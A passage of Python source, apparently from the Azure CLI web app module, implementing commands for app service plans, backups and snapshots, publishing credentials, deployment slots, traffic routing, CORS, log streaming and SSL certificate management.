return {'url': _get_local_git_url(cmd.cli_ctx, client, resource_group_name, name, slot)}
def sync_site_repo(cmd, resource_group_name, name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'sync_repository', slot)
except CloudError as ex: # Because of bad spec, sdk throws on 200. We capture it here
if ex.status_code not in [200, 204]:
raise ex
def list_app_service_plans(cmd, resource_group_name=None):
client = web_client_factory(cmd.cli_ctx)
if resource_group_name is None:
plans = list(client.app_service_plans.list(detailed=True)) # enables querying "numberOfSites"
else:
plans = list(client.app_service_plans.list_by_resource_group(resource_group_name))
for plan in plans:
# prune a few useless fields
del plan.geo_region
del plan.subscription
return plans
# TODO use zone_redundant field on ASP model when we switch to SDK version 5.0.0
def _enable_zone_redundant(plan_def, sku_def, number_of_workers):
plan_def.enable_additional_properties_sending()
existing_properties = plan_def.serialize()["properties"]
plan_def.additional_properties["properties"] = existing_properties
plan_def.additional_properties["properties"]["zoneRedundant"] = True
if number_of_workers is None:
sku_def.capacity = 3
else:
sku_def.capacity = max(3, number_of_workers)
def create_app_service_plan(cmd, resource_group_name, name, is_linux, hyper_v, per_site_scaling=False,
app_service_environment=None, sku='B1', number_of_workers=None, location=None,
tags=None, no_wait=False, zone_redundant=False):
HostingEnvironmentProfile, SkuDescription, AppServicePlan = cmd.get_models(
'HostingEnvironmentProfile', 'SkuDescription', 'AppServicePlan')
client = web_client_factory(cmd.cli_ctx)
if app_service_environment:
if hyper_v:
raise ArgumentUsageError('Windows containers is not yet supported in app service environment')
ase_list = client.app_service_environments.list()
ase_found = False
ase = None
for ase in ase_list:
if ase.name.lower() == app_service_environment.lower() or ase.id.lower() == app_service_environment.lower():
ase_def = HostingEnvironmentProfile(id=ase.id)
location = ase.location
ase_found = True
break
if not ase_found:
err_msg = "App service environment '{}' not found in subscription.".format(app_service_environment)
raise ResourceNotFoundError(err_msg)
else: # Non-ASE
ase_def = None
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
# the api is odd on parameter naming, have to live with it for now
sku_def = SkuDescription(tier=get_sku_tier(sku), name=_normalize_sku(sku), capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), hyper_v=(hyper_v or None), name=name,
per_site_scaling=per_site_scaling, hosting_environment_profile=ase_def)
if sku.upper() in ['WS1', 'WS2', 'WS3']:
existing_plan = get_resource_if_exists(client.app_service_plans,
resource_group_name=resource_group_name, name=name)
if existing_plan and existing_plan.sku.tier != "WorkflowStandard":
raise ValidationError("Plan {} in resource group {} already exists and "
"cannot be updated to a logic app SKU (WS1, WS2, or WS3)")
plan_def.type = "elastic"
if zone_redundant:
_enable_zone_redundant(plan_def, sku_def, number_of_workers)
return sdk_no_wait(no_wait, client.app_service_plans.begin_create_or_update, name=name,
resource_group_name=resource_group_name, app_service_plan=plan_def)
def update_app_service_plan(instance, sku=None, number_of_workers=None, elastic_scale=None,
max_elastic_worker_count=None):
if number_of_workers is None and sku is None and elastic_scale is None and max_elastic_worker_count is None:
args = ["--number-of-workers", "--sku", "--elastic-scale", "--max-elastic-worker-count"]
logger.warning('Nothing to update. Set one of the following parameters to make an update: %s', str(args))
sku_def = instance.sku
if sku is not None:
sku = _normalize_sku(sku)
sku_def.tier = get_sku_tier(sku)
sku_def.name = sku
if number_of_workers is not None:
sku_def.capacity = number_of_workers
else:
number_of_workers = sku_def.capacity
if elastic_scale is not None or max_elastic_worker_count is not None:
if sku is None:
sku = instance.sku.name
if get_sku_tier(sku) not in ["PREMIUMV2", "PREMIUMV3"]:
raise ValidationError("--number-of-workers and --elastic-scale can only be used on premium V2/V3 SKUs. "
"Use command help to see all available SKUs")
if elastic_scale is not None:
# TODO use instance.elastic_scale_enabled once the ASP client factories are updated
use_additional_properties(instance)
instance.additional_properties["properties"]["elasticScaleEnabled"] = elastic_scale
if max_elastic_worker_count is not None:
instance.maximum_elastic_worker_count = max_elastic_worker_count
if max_elastic_worker_count < number_of_workers:
raise InvalidArgumentValueError("--max-elastic-worker-count must be greater than or equal to the "
"plan's number of workers. To update the plan's number of workers, use "
"--number-of-workers ")
# TODO use instance.maximum_elastic_worker_count once the ASP client factories are updated
use_additional_properties(instance)
instance.additional_properties["properties"]["maximumElasticWorkerCount"] = max_elastic_worker_count
instance.sku = sku_def
return instance
def show_plan(cmd, resource_group_name, name):
from azure.cli.core.commands.client_factory import get_subscription_id
client = web_client_factory(cmd.cli_ctx)
serverfarm_url_base = 'subscriptions/{}/resourceGroups/{}/providers/Microsoft.Web/serverfarms/{}?api-version={}'
subscription_id = get_subscription_id(cmd.cli_ctx)
serverfarm_url = serverfarm_url_base.format(subscription_id, resource_group_name, name, client.DEFAULT_API_VERSION)
request_url = cmd.cli_ctx.cloud.endpoints.resource_manager + serverfarm_url
response = send_raw_request(cmd.cli_ctx, "GET", request_url)
return response.json()
def update_functionapp_app_service_plan(cmd, instance, sku=None, number_of_workers=None, max_burst=None):
instance = update_app_service_plan(instance, sku, number_of_workers)
if max_burst is not None:
if not is_plan_elastic_premium(cmd, instance):
raise ValidationError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
instance.maximum_elastic_worker_count = max_burst
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-instances',
number_of_workers, min_val=0, max_val=20)
return update_app_service_plan(instance, sku, number_of_workers)
def show_backup_configuration(cmd, resource_group_name, webapp_name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except Exception: # pylint: disable=broad-except
raise ResourceNotFoundError('Backup configuration not found')
def list_backups(cmd, resource_group_name, webapp_name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'list_backups', slot)
def create_backup(cmd, resource_group_name, webapp_name, storage_account_url,
db_name=None, db_type=None,
db_connection_string=None, backup_name=None, slot=None):
BackupRequest = cmd.get_models('BackupRequest')
client = web_client_factory(cmd.cli_ctx)
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
backup_request = BackupRequest(backup_name=backup_name,
storage_account_url=storage_account_url, databases=db_setting)
if slot:
return client.web_apps.backup_slot(resource_group_name, webapp_name, backup_request, slot)
return client.web_apps.backup(resource_group_name, webapp_name, backup_request)
def update_backup_schedule(cmd, resource_group_name, webapp_name, storage_account_url=None,
frequency=None, keep_at_least_one_backup=None,
retention_period_in_days=None, db_name=None,
db_connection_string=None, db_type=None, backup_name=None, slot=None):
BackupSchedule, BackupRequest = cmd.get_models('BackupSchedule', 'BackupRequest')
configuration = None
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
if not backup_name:
backup_name = '{0}_{1}'.format(webapp_name, datetime.datetime.utcnow().strftime('%Y%m%d%H%M'))
try:
configuration = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except Exception: # pylint: disable=broad-except
# No configuration set yet
if not all([storage_account_url, frequency, retention_period_in_days,
keep_at_least_one_backup]):
raise ResourceNotFoundError('No backup configuration found. A configuration must be created. ' +
'Usage: --container-url URL --frequency TIME --retention DAYS ' +
'--retain-one TRUE/FALSE')
# If arguments were not specified, use the values in the current backup schedule
if storage_account_url is None:
storage_account_url = configuration.storage_account_url
if retention_period_in_days is None:
retention_period_in_days = configuration.backup_schedule.retention_period_in_days
if keep_at_least_one_backup is None:
keep_at_least_one_backup = configuration.backup_schedule.keep_at_least_one_backup
else:
keep_at_least_one_backup = keep_at_least_one_backup.lower() == 'true'
if frequency:
# Parse schedule frequency
frequency_num, frequency_unit = _parse_frequency(cmd, frequency)
else:
frequency_num = configuration.backup_schedule.frequency_interval
frequency_unit = configuration.backup_schedule.frequency_unit
if configuration and configuration.databases:
db = configuration.databases[0]
db_type = db_type or db.database_type
db_name = db_name or db.name
db_connection_string = db_connection_string or db.connection_string
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
backup_schedule = BackupSchedule(frequency_interval=frequency_num, frequency_unit=frequency_unit.name,
keep_at_least_one_backup=keep_at_least_one_backup,
retention_period_in_days=retention_period_in_days)
backup_request = BackupRequest(backup_request_name=backup_name, backup_schedule=backup_schedule,
enabled=True, storage_account_url=storage_account_url,
databases=db_setting)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'update_backup_configuration',
slot, backup_request)
def restore_backup(cmd, resource_group_name, webapp_name, storage_account_url, backup_name,
db_name=None, db_type=None, db_connection_string=None,
target_name=None, overwrite=None, ignore_hostname_conflict=None, slot=None):
RestoreRequest = cmd.get_models('RestoreRequest')
client = web_client_factory(cmd.cli_ctx)
storage_blob_name = backup_name
if not storage_blob_name.lower().endswith('.zip'):
storage_blob_name += '.zip'
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
restore_request = RestoreRequest(storage_account_url=storage_account_url,
blob_name=storage_blob_name, overwrite=overwrite,
site_name=target_name, databases=db_setting,
ignore_conflicting_host_names=ignore_hostname_conflict)
if slot:
return client.web_apps.restore_slot(resource_group_name, webapp_name, 0, restore_request, slot)
return client.web_apps.restore(resource_group_name, webapp_name, 0, restore_request)
def list_snapshots(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_snapshots',
slot)
def restore_snapshot(cmd, resource_group_name, name, time, slot=None, restore_content_only=False, # pylint: disable=redefined-outer-name
source_resource_group=None, source_name=None, source_slot=None):
from azure.cli.core.commands.client_factory import get_subscription_id
SnapshotRecoverySource, SnapshotRestoreRequest = cmd.get_models('SnapshotRecoverySource', 'SnapshotRestoreRequest')
client = web_client_factory(cmd.cli_ctx)
recover_config = not restore_content_only
if all([source_resource_group, source_name]):
# Restore from source app to target app
sub_id = get_subscription_id(cmd.cli_ctx)
source_id = "/subscriptions/" + sub_id + "/resourceGroups/" + source_resource_group + \
"/providers/Microsoft.Web/sites/" + source_name
if source_slot:
source_id = source_id + "/slots/" + source_slot
source = SnapshotRecoverySource(id=source_id)
request = SnapshotRestoreRequest(overwrite=False, snapshot_time=time, recovery_source=source,
recover_configuration=recover_config)
if slot:
return client.web_apps.begin_restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.begin_restore_snapshot(resource_group_name, name, request)
if any([source_resource_group, source_name]):
raise ArgumentUsageError('usage error: --source-resource-group and '
'--source-name must both be specified if one is used')
# Overwrite app with its own snapshot
request = SnapshotRestoreRequest(overwrite=True, snapshot_time=time, recover_configuration=recover_config)
if slot:
return client.web_apps.begin_restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.begin_restore_snapshot(resource_group_name, name, request)
# pylint: disable=inconsistent-return-statements
def _create_db_setting(cmd, db_name, db_type, db_connection_string):
DatabaseBackupSetting = cmd.get_models('DatabaseBackupSetting')
if all([db_name, db_type, db_connection_string]):
return [DatabaseBackupSetting(database_type=db_type, name=db_name, connection_string=db_connection_string)]
if any([db_name, db_type, db_connection_string]):
raise ArgumentUsageError('usage error: --db-name NAME --db-type TYPE --db-connection-string STRING')
def _parse_frequency(cmd, frequency):
FrequencyUnit = cmd.get_models('FrequencyUnit')
unit_part = frequency.lower()[-1]
if unit_part == 'd':
frequency_unit = FrequencyUnit.day
elif unit_part == 'h':
frequency_unit = FrequencyUnit.hour
else:
raise InvalidArgumentValueError('Frequency must end with d or h for "day" or "hour"')
try:
frequency_num = int(frequency[:-1])
except ValueError:
raise InvalidArgumentValueError('Frequency must start with a number')
if frequency_num < 0:
raise InvalidArgumentValueError('Frequency must be positive')
return frequency_num, frequency_unit
def _get_deleted_apps_locations(cli_ctx):
client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
web_provider = client.providers.get('Microsoft.Web')
del_sites_resource = next((x for x in web_provider.resource_types if x.resource_type == 'deletedSites'), None)
if del_sites_resource:
return del_sites_resource.locations
return []
def _get_local_git_url(cli_ctx, client, resource_group_name, name, slot=None):
user = client.get_publishing_user()
result = _generic_site_operation(cli_ctx, resource_group_name, name, 'get_source_control', slot)
parsed = urlparse(result.repo_url)
return '{}://{}@{}/{}.git'.format(parsed.scheme, user.publishing_user_name,
parsed.netloc, name)
def _get_scm_url(cmd, resource_group_name, name, slot=None):
from azure.mgmt.web.models import HostType
app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
for host in app.host_name_ssl_states or []:
if host.host_type == HostType.repository:
return "https://{}".format(host.name)
# this should not happen, but throw anyway
raise ResourceNotFoundError('Failed to retrieve Scm Uri')
def get_publishing_user(cmd):
client = web_client_factory(cmd.cli_ctx)
return client.get_publishing_user()
def set_deployment_user(cmd, user_name, password=None):
'''
Update deployment credentials.(Note, all webapps in your subscription will be impacted)
'''
User = cmd.get_models('User')
client = web_client_factory(cmd.cli_ctx)
user = User(publishing_user_name=user_name)
if password is None:
try:
password = prompt_pass(msg='Password: ', confirm=True)
except NoTTYException:
raise ArgumentUsageError('Please specify both username and password in non-interactive mode.')
user.publishing_password = password
return client.update_publishing_user(user)
def list_publishing_credentials(cmd, resource_group_name, name, slot=None):
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'begin_list_publishing_credentials', slot)
return content.result()
def list_publish_profiles(cmd, resource_group_name, name, slot=None, xml=False):
import xmltodict
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_publishing_profile_xml_with_secrets', slot, {"format": "WebDeploy"})
full_xml = ''
for f in content:
full_xml += f.decode()
if not xml:
profiles = xmltodict.parse(full_xml, xml_attribs=True)['publishData']['publishProfile']
converted = []
if not isinstance(profiles, list):
profiles = [profiles]
for profile in profiles:
new = {}
for key in profile:
# strip the leading '@' xmltodict put in for attributes
new[key.lstrip('@')] = profile[key]
converted.append(new)
return converted
cmd.cli_ctx.invocation.data['output'] = 'tsv'
return full_xml
def enable_cd(cmd, resource_group_name, name, enable, slot=None):
settings = []
settings.append("DOCKER_ENABLE_CI=" + enable)
update_app_settings(cmd, resource_group_name, name, settings, slot)
return show_container_cd_url(cmd, resource_group_name, name, slot)
def show_container_cd_url(cmd, resource_group_name, name, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
docker_enabled = False
for setting in settings:
if setting['name'] == 'DOCKER_ENABLE_CI' and setting['value'] == 'true':
docker_enabled = True
break
cd_settings = {}
cd_settings['DOCKER_ENABLE_CI'] = docker_enabled
if docker_enabled:
credentials = list_publishing_credentials(cmd, resource_group_name, name, slot)
if credentials:
cd_url = credentials.scm_uri + '/docker/hook'
cd_settings['CI_CD_URL'] = cd_url
else:
cd_settings['CI_CD_URL'] = ''
return cd_settings
def view_in_browser(cmd, resource_group_name, name, slot=None, logs=False):
url = _get_url(cmd, resource_group_name, name, slot)
open_page_in_browser(url)
if logs:
get_streaming_log(cmd, resource_group_name, name, provider=None, slot=slot)
def _get_url(cmd, resource_group_name, name, slot=None):
SslState = cmd.get_models('SslState')
site = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not site:
raise ResourceNotFoundError("'{}' app doesn't exist".format(name))
url = site.enabled_host_names[0] # picks the custom domain URL incase a domain is assigned
ssl_host = next((h for h in site.host_name_ssl_states
if h.ssl_state != SslState.disabled), None)
return ('https' if ssl_host else 'http') + '://' + url
# TODO: expose new blob support
def config_diagnostics(cmd, resource_group_name, name, level=None,
application_logging=None, web_server_logging=None,
docker_container_logging=None, detailed_error_messages=None,
failed_request_tracing=None, slot=None):
from azure.mgmt.web.models import (FileSystemApplicationLogsConfig, ApplicationLogsConfig,
AzureBlobStorageApplicationLogsConfig, SiteLogsConfig,
HttpLogsConfig, FileSystemHttpLogsConfig,
EnabledConfig)
client = web_client_factory(cmd.cli_ctx)
# TODO: ensure we call get_site only once
site = client.web_apps.get(resource_group_name, name)
if not site:
raise ResourceNotFoundError("'{}' app doesn't exist".format(name))
application_logs = None
if application_logging:
fs_log = None
blob_log = None
level = level if application_logging != 'off' else False
level = True if level is None else level
if application_logging in ['filesystem', 'off']:
fs_log = FileSystemApplicationLogsConfig(level=level)
if application_logging in ['azureblobstorage', 'off']:
blob_log = AzureBlobStorageApplicationLogsConfig(level=level, retention_in_days=3,
sas_url=None)
application_logs = ApplicationLogsConfig(file_system=fs_log,
azure_blob_storage=blob_log)
http_logs = None
server_logging_option = web_server_logging or docker_container_logging
if server_logging_option:
# TODO: az blob storage log config currently not in use, will be impelemented later.
# Tracked as Issue: #4764 on Github
filesystem_log_config = None
turned_on = server_logging_option != 'off'
if server_logging_option in ['filesystem', 'off']:
# 100 mb max log size, retention lasts 3 days. Yes we hard code it, portal does too
filesystem_log_config = FileSystemHttpLogsConfig(retention_in_mb=100, retention_in_days=3,
enabled=turned_on)
http_logs = HttpLogsConfig(file_system=filesystem_log_config, azure_blob_storage=None)
detailed_error_messages_logs = (None if detailed_error_messages is None
else EnabledConfig(enabled=detailed_error_messages))
failed_request_tracing_logs = (None if failed_request_tracing is None
else EnabledConfig(enabled=failed_request_tracing))
site_log_config = SiteLogsConfig(application_logs=application_logs,
http_logs=http_logs,
failed_requests_tracing=failed_request_tracing_logs,
detailed_error_messages=detailed_error_messages_logs)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_diagnostic_logs_config',
slot, site_log_config)
def show_diagnostic_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_diagnostic_logs_configuration', slot)
def show_deployment_log(cmd, resource_group, name, slot=None, deployment_id=None):
import urllib3
import requests
scm_url = _get_scm_url(cmd, resource_group, name, slot)
username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot)
headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password))
deployment_log_url = ''
if deployment_id:
deployment_log_url = '{}/api/deployments/{}/log'.format(scm_url, deployment_id)
else:
deployments_url = '{}/api/deployments/'.format(scm_url)
response = requests.get(deployments_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
deployments_url, response.status_code, response.reason))
sorted_logs = sorted(
response.json(),
key=lambda x: x['start_time'],
reverse=True
)
if sorted_logs and sorted_logs[0]:
deployment_log_url = sorted_logs[0].get('log_url', '')
if deployment_log_url:
response = requests.get(deployment_log_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
deployment_log_url, response.status_code, response.reason))
return response.json()
return []
def list_deployment_logs(cmd, resource_group, name, slot=None):
scm_url = _get_scm_url(cmd, resource_group, name, slot)
deployment_log_url = '{}/api/deployments/'.format(scm_url)
username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot)
import urllib3
headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password))
import requests
response = requests.get(deployment_log_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
scm_url, response.status_code, response.reason))
return response.json() or []
def config_slot_auto_swap(cmd, resource_group_name, webapp, slot, auto_swap_slot=None, disable=None):
client = web_client_factory(cmd.cli_ctx)
site_config = client.web_apps.get_configuration_slot(resource_group_name, webapp, slot)
site_config.auto_swap_slot_name = '' if disable else (auto_swap_slot or 'production')
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp, 'update_configuration', slot, site_config)
def list_slots(cmd, resource_group_name, webapp):
client = web_client_factory(cmd.cli_ctx)
slots = list(client.web_apps.list_slots(resource_group_name, webapp))
for slot in slots:
slot.name = slot.name.split('/')[-1]
setattr(slot, 'app_service_plan', parse_resource_id(slot.server_farm_id)['name'])
del slot.server_farm_id
return slots
def swap_slot(cmd, resource_group_name, webapp, slot, target_slot=None, preserve_vnet=None, action='swap'):
client = web_client_factory(cmd.cli_ctx)
# Default isPreserveVnet to 'True' if preserve_vnet is 'None'
isPreserveVnet = preserve_vnet if preserve_vnet is not None else 'true'
# converstion from string to Boolean
isPreserveVnet = bool(isPreserveVnet == 'true')
CsmSlotEntity = cmd.get_models('CsmSlotEntity')
slot_swap_entity = CsmSlotEntity(target_slot=target_slot or 'production', preserve_vnet=isPreserveVnet)
if action == 'swap':
poller = client.web_apps.begin_swap_slot(resource_group_name, webapp, slot, slot_swap_entity)
return poller
if action == 'preview':
if slot is None:
result = client.web_apps.apply_slot_config_to_production(resource_group_name, webapp, slot_swap_entity)
else:
result = client.web_apps.apply_slot_configuration_slot(resource_group_name, webapp, slot, slot_swap_entity)
return result
# we will reset both source slot and target slot
if target_slot is None:
client.web_apps.reset_production_slot_config(resource_group_name, webapp)
else:
client.web_apps.reset_slot_configuration_slot(resource_group_name, webapp, target_slot)
return None
def delete_slot(cmd, resource_group_name, webapp, slot):
client = web_client_factory(cmd.cli_ctx)
# TODO: once swagger finalized, expose other parameters like: delete_all_slots, etc...
client.web_apps.delete_slot(resource_group_name, webapp, slot)
def set_traffic_routing(cmd, resource_group_name, name, distribution):
RampUpRule = cmd.get_models('RampUpRule')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise ResourceNotFoundError("'{}' app doesn't exist".format(name))
configs = get_site_configs(cmd, resource_group_name, name)
host_name_split = site.default_host_name.split('.', 1)
host_name_suffix = '.' + host_name_split[1]
host_name_val = host_name_split[0]
configs.experiments.ramp_up_rules = []
for r in distribution:
slot, percentage = r.split('=')
action_host_name_slot = host_name_val + "-" + slot
configs.experiments.ramp_up_rules.append(RampUpRule(action_host_name=action_host_name_slot + host_name_suffix,
reroute_percentage=float(percentage),
name=slot))
_generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', None, configs)
return configs.experiments.ramp_up_rules
def show_traffic_routing(cmd, resource_group_name, name):
configs = get_site_configs(cmd, resource_group_name, name)
return configs.experiments.ramp_up_rules
def clear_traffic_routing(cmd, resource_group_name, name):
set_traffic_routing(cmd, resource_group_name, name, [])
def add_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
from azure.mgmt.web.models import CorsSettings
configs = get_site_configs(cmd, resource_group_name, name, slot)
if not configs.cors:
configs.cors = CorsSettings()
configs.cors.allowed_origins = (configs.cors.allowed_origins or []) + allowed_origins
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return result.cors
def remove_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if configs.cors:
if allowed_origins:
configs.cors.allowed_origins = [x for x in (configs.cors.allowed_origins or []) if x not in allowed_origins]
else:
configs.cors.allowed_origins = []
configs = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return configs.cors
def show_cors(cmd, resource_group_name, name, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
return configs.cors
def get_streaming_log(cmd, resource_group_name, name, provider=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
streaming_url = scm_url + '/logstream'
if provider:
streaming_url += ('/' + provider.lstrip('/'))
user, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
t = threading.Thread(target=_get_log, args=(streaming_url, user, password))
t.daemon = True
t.start()
while True:
time.sleep(100) # so that ctrl+c can stop the command
def download_historical_logs(cmd, resource_group_name, name, log_file=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
url = scm_url.rstrip('/') + '/dump'
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
_get_log(url, user_name, password, log_file)
logger.warning('Downloaded logs to %s', log_file)
def _get_site_credential(cli_ctx, resource_group_name, name, slot=None):
creds = _generic_site_operation(cli_ctx, resource_group_name, name, 'begin_list_publishing_credentials', slot)
creds = creds.result()
return (creds.publishing_user_name, creds.publishing_password)
def _get_log(url, user_name, password, log_file=None):
import urllib3
try:
import urllib3.contrib.pyopenssl
urllib3.contrib.pyopenssl.inject_into_urllib3()
except ImportError:
pass
http = get_pool_manager(url)
headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
r = http.request(
'GET',
url,
headers=headers,
preload_content=False
)
if r.status != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
url, r.status, r.reason))
if log_file: # download logs
with open(log_file, 'wb') as f:
while True:
data = r.read(1024)
if not data:
break
f.write(data)
else: # streaming
std_encoding = sys.stdout.encoding
for chunk in r.stream():
if chunk:
# Extra encode() and decode for stdout which does not surpport 'utf-8'
logger.warning(chunk.decode(encoding='utf-8', errors='replace')
.encode(std_encoding, errors='replace')
.decode(std_encoding, errors='replace')
.rstrip('\n\r')) # each line of log has CRLF.
r.release_conn()
def upload_ssl_cert(cmd, resource_group_name, name, certificate_password, certificate_file, slot=None):
Certificate = cmd.get_models('Certificate')
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
cert_file = open(certificate_file, 'rb')
cert_contents = cert_file.read()
hosting_environment_profile_param = (webapp.hosting_environment_profile.name
if webapp.hosting_environment_profile else '')
thumb_print = _get_cert(certificate_password, certificate_file)
cert_name = _generate_cert_name(thumb_print, hosting_environment_profile_param,
webapp.location, resource_group_name)
cert = Certificate(password=certificate_password, pfx_blob=cert_contents,
location=webapp.location, server_farm_id=webapp.server_farm_id)
return client.certificates.create_or_update(resource_group_name, cert_name, cert)
def _generate_cert_name(thumb_print, hosting_environment, location, resource_group_name):
return "%s_%s_%s_%s" % (thumb_print, hosting_environment, location, resource_group_name)
def _get_cert(certificate_password, certificate_file):
''' Decrypts the .pfx file '''
p12 = OpenSSL.crypto.load_pkcs12(open(certificate_file, 'rb').read(), certificate_password)
cert = p12.get_certificate()
digest_algorithm = 'sha1'
thumbprint = cert.digest(digest_algorithm).decode("utf-8").replace(':', '')
return thumbprint
def list_ssl_certs(cmd, resource_group_name):
client = web_client_factory(cmd.cli_ctx)
return client.certificates.list_by_resource_group(resource_group_name)
def show_ssl_cert(cmd, resource_group_name, certificate_name):
client = web_client_factory(cmd.cli_ctx)
return client.certificates.get(resource_group_name, certificate_name)
def delete_ssl_cert(cmd, resource_group_name, certificate_thumbprint):
client = web_client_factory(cmd.cli_ctx)
webapp_certs = client.certificates.list_by_resource_group(resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
return client.certificates.delete(resource_group_name, webapp_cert.name)
raise ResourceNotFoundError("Certificate for thumbprint '{}' not found".format(certificate_thumbprint))
def import_ssl_cert(cmd, resource_group_name, name, key_vault, key_vault_certificate_name):
Certificate = cmd.get_models('Certificate')
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise ResourceNotFoundError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
server_farm_id = webapp.server_farm_id
location = webapp.location
kv_id = None
if not is_valid_resource_id(key_vault):
kv_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_KEYVAULT)
key_vaults = kv_client.vaults.list_by_subscription()
for kv in key_vaults:
if key_vault == kv.name:
kv_id = kv.id
break
else:
kv_id = key_vault
if kv_id is None:
kv_msg = 'The Key Vault {0} was not found in the subscription in context. ' \
'If your Key Vault is in a different subscription, please specify the full Resource ID: ' \
'\naz .. ssl import -n {1} -g {2} --key-vault-certificate-name {3} ' \
'--key-vault /subscriptions/[sub id]/resourceGroups/[rg]/providers/Microsoft.KeyVault/' \
'vaults/{0}'.format(key_vault, name, resource_group_name, key_vault_certificate_name)
logger.warning(kv_msg)
return
kv_id_parts = parse_resource_id(kv_id)
kv_name = kv_id_parts['name']
kv_resource_group_name = kv_id_parts['resource_group']
kv_subscription = kv_id_parts['subscription']
# If in the public cloud, check if certificate is an app service certificate, in the same or a diferent
# subscription
kv_secret_name = None
cloud_type = cmd.cli_ctx.cloud.name
from azure.cli.core.commands.client_factory import get_subscription_id
subscription_id = get_subscription_id(cmd.cli_ctx)
if cloud_type.lower() == PUBLIC_CLOUD.lower():
if kv_subscription.lower() != subscription_id.lower():
diff_subscription_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_APPSERVICE,
subscription_id=kv_subscription)
ascs = diff_subscription_client.app_service_certificate_orders.list()
else:
ascs = client.app_service_certificate_orders.list()
kv_secret_name = None
for asc in ascs:
if asc.name == key_vault_certificate_name:
kv_secret_name = asc.certificates[key_vault_certificate_name].key_vault_secret_name
# if kv_secret_name is not populated, it is not an appservice certificate, proceed for KV certificates
if not kv_secret_name:
kv_secret_name = key_vault_certificate_name
cert_name = '{}-{}-{}'.format(resource_group_name, kv_name, key_vault_certificate_name)
lnk = 'https://azure.github.io/AppService/2016/05/24/Deploying-Azure-Web-App-Certificate-through-Key-Vault.html'
lnk_msg = 'Find more details here: {}'.format(lnk)
if not _check_service_principal_permissions(cmd, kv_resource_group_name, kv_name, kv_subscription):
logger.warning('Unable to verify Key Vault permissions.')
logger.warning('You may need to grant Microsoft.Azure.WebSites service principal the Secret:Get permission')
logger.warning(lnk_msg)
kv_cert_def = Certificate(location=location, key_vault_id=kv_id, password='',
key_vault_secret_name=kv_secret_name, server_farm_id=server_farm_id)
return client.certificates.create_or_update(name=cert_name, resource_group_name=resource_group_name,
certificate_envelope=kv_cert_def)
def create_managed_ssl_cert(cmd, resource_group_name, name, hostname, slot=None):
Certificate = cmd.get_models('Certificate')
hostname = hostname.lower()
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not webapp:
slot_text = "Deployment slot {} in ".format(slot) if slot else ''
